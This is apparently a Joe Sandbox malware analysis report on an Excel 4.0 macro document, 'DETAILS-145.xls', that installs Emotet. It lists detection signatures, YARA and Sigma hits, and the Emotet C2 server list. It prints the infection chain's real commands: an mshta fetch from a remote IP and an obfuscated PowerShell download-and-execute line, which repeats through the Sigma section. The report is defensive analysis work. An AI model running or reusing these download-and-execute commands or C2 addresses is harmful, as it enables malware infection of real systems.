Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DETAILS-145.xls

Overview

General Information

Sample Name:DETAILS-145.xls
Analysis ID:562407
MD5:c15231bf03d2cde2f5d16665421d03a1
SHA1:e552fc97c08d64ac0d17c4cebf428665982600ed
SHA256:107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1272 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1188 cmdline: cmd /c mshta http://91.240.118.168/qqw/aas/se.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2816 cmdline: mshta http://91.240.118.168/qqw/aas/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 152 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2116 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2016 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 836 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 284 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1204 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1136 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2080 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 324 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
DETAILS-145.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
DETAILS-145.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    DETAILS-145.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
    • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
    • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
    • 0x946:$x1: * #,##0
    • 0x952:$x1: * #,##0
    • 0x9fb:$x1: * #,##0
    • 0xa0a:$x1: * #,##0
    • 0xa36:$x1: * #,##0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\DETAILS-145.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x108a2:$s1: Excel
    • 0x11913:$s1: Excel
    • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\DETAILS-145.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\Users\user\Desktop\DETAILS-145.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
      • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
      • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
      • 0x946:$x1: * #,##0
      • 0x952:$x1: * #,##0
      • 0x9fb:$x1: * #,##0
      • 0xa0a:$x1: * #,##0
      • 0xa36:$x1: * #,##0
      C:\ProgramData\QWER.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 73 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.rundll32.exe.2a0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    17.2.rundll32.exe.2810000.7.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      18.2.rundll32.exe.1d0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        9.2.rundll32.exe.140000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          15.2.rundll32.exe.2f40000.12.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 107 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2816, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1188, ProcessCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2816
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1272, ProcessCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 1188
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2816, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1516

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://kuyporn.com/wp-content/XSAvira URL Cloud: Label: malware
                            Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0Avira URL Cloud: Label: malware
